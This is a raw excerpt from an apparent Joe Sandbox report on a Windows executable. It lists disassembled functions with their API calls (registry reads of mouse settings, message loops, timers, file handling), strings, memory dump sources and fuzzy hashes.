                                                                                                                                                                                                                                                                                    control_flow_graph 1062 ae58cb-ae58d6 1063 ae5948-ae594a 1062->1063 1064 ae58d8-ae58dd 1062->1064 1066 ae593b-ae593e 1063->1066 1064->1063 1065 ae58df-ae58f7 RegOpenKeyExW 1064->1065 1065->1063 1067 ae58f9-ae5918 RegQueryValueExW 1065->1067 1068 ae592f-ae593a RegCloseKey 1067->1068 1069 ae591a-ae5925 1067->1069 1068->1066 1070 ae593f-ae5946 1069->1070 1071 ae5927-ae5929 1069->1071 1072 ae592d 1070->1072 1071->1072 1072->1068
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AE58BE,SwapMouseButtons,00000004,?), ref: 00AE58EF
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AE58BE,SwapMouseButtons,00000004,?), ref: 00AE5910
                                                                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00AE58BE,SwapMouseButtons,00000004,?), ref: 00AE5932
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                    • Opcode ID: 45eb8ce17c9c6b41a69535b8244107d1f189d173f392348e68749e297990b49c
                                                                                                                                                                                                                                                                                    • Instruction ID: 4fd8aa884ccf6cd151ef48ae9ce283b1dcd11b522572bcbb0d68da1f493932ce
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45eb8ce17c9c6b41a69535b8244107d1f189d173f392348e68749e297990b49c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4117C75910658FFDB218F65EC80DEE77B8EF01764F104419F805E7210E6319E4197A0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Variable must be of type 'Object'., xrefs: 00B348C6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                    • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                    • Opcode ID: 3e4d3030937d1bef2234f2eab299eca6500354d8facec9bb9e4f8534b8f23d3d
                                                                                                                                                                                                                                                                                    • Instruction ID: df6d78dcdfb09045eccab2983e3543dca7d8b940e4d9a396da2d1ab6fa2d02e0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e4d3030937d1bef2234f2eab299eca6500354d8facec9bb9e4f8534b8f23d3d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70C27871A00249DFCB24DF99C880BAEB7F1FF19710F2481A9E945AB392D775AD41CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00AF15F2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 22a59d716aeac685d11459b95b6e450c8cf9d08755316b37d9bff920a6283958
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e0f6fd4f6cab9c0e0c76519a68ece7ddf1f9c7bfe90b8265fc20fbf42f18a42
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22a59d716aeac685d11459b95b6e450c8cf9d08755316b37d9bff920a6283958
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DB25674A08345CFCB24DF58C480A3AB7F1BB99700F64899DFA859B392D771E941CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00B009D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B03614: RaiseException.KERNEL32(?,?,?,00B009FA,?,00000000,?,?,?,?,?,?,00B009FA,00000000,00BA9758,00000000), ref: 00B03674
                                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00B009F5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                    • Opcode ID: 379a3685636a22b0f041ac6d3811c8279859f72ba76082bdf9d19c1b334c4d38
                                                                                                                                                                                                                                                                                    • Instruction ID: 6eb332cb0e99ce0c09d5a3f5b9b33e4e36ca95561070d304e5005b769827c61b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 379a3685636a22b0f041ac6d3811c8279859f72ba76082bdf9d19c1b334c4d38
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F0F63492420DB7CB00BAA8EC46E9E7FEC9E01750F6041F1B924A65F2FB71EA15C6D0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B68D52
                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00B68D59
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00B68F3A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 423db76ae9ffe8e13b28b8d84bd8627c3c28be569ad37d79a3519006fddbdc02
                                                                                                                                                                                                                                                                                    • Instruction ID: 780ad9c409e7322428f2636eaf9f4ac110b0b2aa5c6a5a5ca67afd1c906fabdc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 423db76ae9ffe8e13b28b8d84bd8627c3c28be569ad37d79a3519006fddbdc02
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF125A71A083419FC714DF28C484B2ABBE5FF88314F14899DE8899B292DB75ED45CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AE32AF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AE32B7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AE32C2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AE32CD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AE32D5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AE32DD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3205: RegisterWindowMessageW.USER32(00000004,?,00AE2964), ref: 00AE325D
                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AE2A0A
                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32 ref: 00AE2A28
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00B23A0D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                    • Opcode ID: fc61272c8a3a5640e2ba9e8dcc8d292c6ab87b62c177dd2bd23f5c9582fa2920
                                                                                                                                                                                                                                                                                    • Instruction ID: 6ba4fc60cf979fe23ae0a043933271d281e7a85c5b8200b9ddb421c26ca53f18
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc61272c8a3a5640e2ba9e8dcc8d292c6ab87b62c177dd2bd23f5c9582fa2920
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66719BB19112408FD7A8EF7AAE696663BE0BB68344340876AE519C7371EFF09441CF64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AE6299
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00AFFD36
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AFFD45
                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B3FE33
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 65777d86cb6b73457a604008a45d44b2c7377bd358c9ba304a30821f4f417254
                                                                                                                                                                                                                                                                                    • Instruction ID: e6d91a879a60edad537ff366a35260f4a3d44e83728e3d464fd4d87d60874119
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65777d86cb6b73457a604008a45d44b2c7377bd358c9ba304a30821f4f417254
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C316471904354AFEB328F24C895BE6BBEC9F16308F1004AEE69A97242D7745A85CB51
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00B1894C,?,00BA9CE8,0000000C), ref: 00B18A84
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00B1894C,?,00BA9CE8,0000000C), ref: 00B18A8E
                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B18AB9
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 650b005a190e69720a4cbff757b0483bf7df7357a78e59300471b2a85f5bc98c
                                                                                                                                                                                                                                                                                    • Instruction ID: 4f1b3bd7f5798b269e883b755b4ce8d1c9044f289224a178111a7bedf1c798f3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 650b005a190e69720a4cbff757b0483bf7df7357a78e59300471b2a85f5bc98c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC0104326251609BC6346234A886BFE67C9EFC2734FA902DAF8189B1D2DF718DC18590
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00B197BA,FF8BC369,00000000,00000002,00000000), ref: 00B19744
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00B197BA,FF8BC369,00000000,00000002,00000000,?,00B15ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00B06F41), ref: 00B1974E
                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B19755
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2d38f9229cd122c58ea2c59063dc31b3cc7443fff662d2f439ec6041a0d39505
                                                                                                                                                                                                                                                                                    • Instruction ID: abffe48ef62ae83222fa5a88afb0428954680ef2503d36a66e4b0599432e87a6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d38f9229cd122c58ea2c59063dc31b3cc7443fff662d2f439ec6041a0d39505
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30019C33720104ABCB119F99DC05CEE3BA9EF81330B640288F8109B1D0EB31DE81CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00AEF27B
                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00AEF289
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AEF29F
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00AEF2B1
                                                                                                                                                                                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00B332D8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3d1c3761cd8e1492435a5fc231dfbb7a0de49a8bb0deb70b51f7e58ef0cb1fb4
                                                                                                                                                                                                                                                                                    • Instruction ID: 4f6e676d12f109756abed6a03cf60415ec4a5c34631801eba278053b5b6689b0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d1c3761cd8e1492435a5fc231dfbb7a0de49a8bb0deb70b51f7e58ef0cb1fb4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40F0DA316043849BE774DBA1DC89FEA73A8EF84751F104929E25A97090DB7495888B25
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00AF3006
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                    • String ID: CALL
                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                    • Opcode ID: 2c8dd75e806d83e227ba47dfe08a2e256617d635ba83fb76717d89d7822f005e
                                                                                                                                                                                                                                                                                    • Instruction ID: d39515b981b94bde38f44be81bee4163fa34ba9df69423b99f836d91c9f040be
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c8dd75e806d83e227ba47dfe08a2e256617d635ba83fb76717d89d7822f005e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9229CB06082059FC724DF54C884B2ABBF1FF88314F24899DF6968B3A1DB71E941CB52
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 06311a85d943b8e81ad4f14d8d15f551d541a959b2f5427142077bb3db06ffac
                                                                                                                                                                                                                                                                                    • Instruction ID: 0a91e654767ddcc955c3b1abcc8a6a523d85693486e24852d1169ba3709fbc14
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06311a85d943b8e81ad4f14d8d15f551d541a959b2f5427142077bb3db06ffac
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A329C30A00219EFCB20EF94D891BBEB7F4EF14354F248598F955AB2A1E771AD44CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00B2413B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE55D1,?,?,00B24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00AE5871
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AE3A76
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
